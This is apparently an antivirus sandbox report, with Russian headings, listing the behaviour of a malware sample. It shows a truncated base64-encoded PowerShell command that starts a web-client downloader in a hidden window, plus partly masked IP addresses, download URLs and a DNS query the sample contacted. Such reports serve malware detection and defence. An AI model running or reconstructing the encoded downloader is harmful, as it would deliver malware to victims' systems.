Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxADMAXwAwADEAOQAzAD0AKAAnAEUANwAyADIANwAnACsAJwA3ADcAJwArACcAOQAnACkAOwAkAG4ANQA4AF8AMQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMAMQA4ADAANgBfADEAPQAoAC...
- '34.##7.166.101':80
- '20#.#89.181.0':80
- '17#.#28.238.130':80
- '18.##7.109.124':80
- '17#.#29.125.175':80
- http://34.##7.166.101/hNKLRWbxdnMi
- http://20#.#89.181.0/NuSbeo2mclSK_e
- http://17#.#28.238.130/NTz1JiCB7Vy_z
- DNS ASK sa#######ard.comntz1jicb7vy_z
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxADMAXwAwADEAOQAzAD0AKAAnAEUANwAyADIANwAnACsAJwA3ADcAJwArACcAOQAnACkAOwAkAG4ANQA4AF8AMQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMAMQA4ADAANgBfADEAPQAoAC...' (со скрытым окном)